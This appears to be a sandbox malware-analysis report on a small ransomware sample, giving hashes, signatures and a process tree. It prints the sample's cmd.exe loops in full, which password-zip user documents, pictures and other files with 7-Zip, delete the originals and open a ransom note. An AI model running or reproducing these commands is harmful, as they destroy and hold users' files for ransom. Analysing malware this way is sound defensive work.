Analysis
-
max time kernel
107s -
max time network
74s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
28-04-2020 01:36
Static task
static1
Behavioral task
behavioral1
Sample
prueba2.exe
Resource
win7v200410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
prueba2.exe
Resource
win10v200410
windows10_x64
0 signatures
0 seconds
General
-
Target
prueba2.exe
-
Size
329KB
-
MD5
9f5f9c71bb71b8e1571fc4d27721a99e
-
SHA1
e64de07b46d896d25dc059dd774a140f109364c3
-
SHA256
be3d67f3432d29b8339b324a0ee3150039da4cd7e95a3dcb564cca70f572603f
-
SHA512
6c5f031ef96f6fb930bb57c0cc1287f2f34d21475f2710f88341f955405e9cc37143a037939d5cd8387fe80f63ef9ad3ca7b70575d75dcfbca475bda9d941c16
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
prueba2.exedescription pid process target process PID 2040 wrote to memory of 1116 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1116 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1116 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1004 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1004 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1004 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1704 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1704 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1704 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 868 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 868 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 868 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 456 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 456 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 456 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1800 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1800 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1800 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1768 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1768 2040 prueba2.exe cmd.exe PID 2040 wrote to memory of 1768 2040 prueba2.exe cmd.exe -
Suspicious use of AdjustPrivilegeToken 84 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exedescription pid process Token: SeRestorePrivilege 316 7z.exe Token: 35 316 7z.exe Token: SeSecurityPrivilege 316 7z.exe Token: SeSecurityPrivilege 316 7z.exe Token: SeRestorePrivilege 1128 7z.exe Token: 35 1128 7z.exe Token: SeSecurityPrivilege 1128 7z.exe Token: SeSecurityPrivilege 1128 7z.exe Token: SeRestorePrivilege 1316 7z.exe Token: 35 1316 7z.exe Token: SeSecurityPrivilege 1316 7z.exe Token: SeSecurityPrivilege 1316 7z.exe Token: SeRestorePrivilege 624 7z.exe Token: 35 624 7z.exe Token: SeSecurityPrivilege 624 7z.exe Token: SeSecurityPrivilege 624 7z.exe Token: SeRestorePrivilege 1336 7z.exe Token: 35 1336 7z.exe Token: SeSecurityPrivilege 1336 7z.exe Token: SeSecurityPrivilege 1336 7z.exe Token: SeRestorePrivilege 1436 7z.exe Token: 35 1436 7z.exe Token: SeSecurityPrivilege 1436 7z.exe Token: SeSecurityPrivilege 1436 7z.exe Token: SeRestorePrivilege 1476 7z.exe Token: 35 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeSecurityPrivilege 1476 7z.exe Token: SeRestorePrivilege 1520 7z.exe Token: 35 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeSecurityPrivilege 1520 7z.exe Token: SeRestorePrivilege 1612 7z.exe Token: 35 1612 7z.exe Token: SeSecurityPrivilege 1612 7z.exe Token: SeSecurityPrivilege 1612 7z.exe Token: SeRestorePrivilege 1624 7z.exe Token: 35 1624 7z.exe Token: SeSecurityPrivilege 1624 7z.exe Token: SeSecurityPrivilege 1624 7z.exe Token: SeRestorePrivilege 1656 7z.exe Token: 35 1656 7z.exe Token: SeSecurityPrivilege 1656 7z.exe Token: SeSecurityPrivilege 1656 7z.exe Token: SeRestorePrivilege 1668 7z.exe Token: 35 1668 7z.exe Token: SeSecurityPrivilege 1668 7z.exe Token: SeSecurityPrivilege 1668 7z.exe Token: SeRestorePrivilege 1664 7z.exe Token: 35 1664 7z.exe Token: SeSecurityPrivilege 1664 7z.exe Token: SeSecurityPrivilege 1664 7z.exe Token: SeRestorePrivilege 1688 7z.exe Token: 35 1688 7z.exe Token: SeSecurityPrivilege 1688 7z.exe Token: SeSecurityPrivilege 1688 7z.exe Token: SeRestorePrivilege 792 7z.exe Token: 35 792 7z.exe Token: SeSecurityPrivilege 792 7z.exe Token: SeSecurityPrivilege 792 7z.exe Token: SeRestorePrivilege 328 7z.exe Token: 35 328 7z.exe Token: SeSecurityPrivilege 328 7z.exe Token: SeSecurityPrivilege 328 7z.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 1736 NOTEPAD.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\prueba2.exe"C:\Users\Admin\AppData\Local\Temp\prueba2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Are.docx.geminis3" "C:\Users\Admin\Documents\Are.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Files.docx.geminis3" "C:\Users\Admin\Documents\Files.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Opened.docx.geminis3" "C:\Users\Admin\Documents\Opened.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\Recently.docx.geminis3" "C:\Users\Admin\Documents\Recently.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\StepMount.docm.geminis3" "C:\Users\Admin\Documents\StepMount.docm"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\These.docx.geminis3" "C:\Users\Admin\Documents\These.docx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\UseAssert.docm.geminis3" "C:\Users\Admin\Documents\UseAssert.docm"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\OutBackup.pdf.geminis3" "C:\Users\Admin\Documents\OutBackup.pdf"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\BlockDebug.xlsm.geminis3" "C:\Users\Admin\Documents\BlockDebug.xlsm"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\EnterMerge.xls.geminis3" "C:\Users\Admin\Documents\EnterMerge.xls"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\MeasureApprove.xls.geminis3" "C:\Users\Admin\Documents\MeasureApprove.xls"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\ConvertToEdit.pptx.geminis3" "C:\Users\Admin\Documents\ConvertToEdit.pptx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Documents\NewMeasure.pptx.geminis3" "C:\Users\Admin\Documents\NewMeasure.pptx"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Pictures %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConnectComplete.jpg.geminis3" "C:\Users\Admin\Pictures\ConnectComplete.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\ConvertToSend.jpg.geminis3" "C:\Users\Admin\Pictures\ConvertToSend.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\Wallpaper.jpg.geminis3" "C:\Users\Admin\Pictures\Wallpaper.jpg"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Pictures\RegisterNew.png.geminis3" "C:\Users\Admin\Pictures\RegisterNew.png"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Downloads %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\ConvertToFormat.ppt.geminis3" "C:\Users\Admin\Downloads\ConvertToFormat.ppt"3⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\EnterSync.txt.geminis3" "C:\Users\Admin\Downloads\EnterSync.txt"3⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Downloads\StopOpen.rar.geminis3" "C:\Users\Admin\Downloads\StopOpen.rar"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Music %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Videos %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Desktop %d in (*.jpg *.jpeg *.doc *docx *pdf *xls *xlsx *ppt *pptx *png *mp3 *txt *zip *rar *7z *mp3 *mp4) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "%d.geminis3" "%d"2⤵
-
C:\PROGRA~1\7-ZIP\7z.exe"C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel -p23162 "C:\Users\Admin\Desktop\FormatUnlock.7z.geminis3" "C:\Users\Admin\Desktop\FormatUnlock.7z"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start README.txt2⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\README.txt3⤵
- Opens file in notepad (likely ransom note)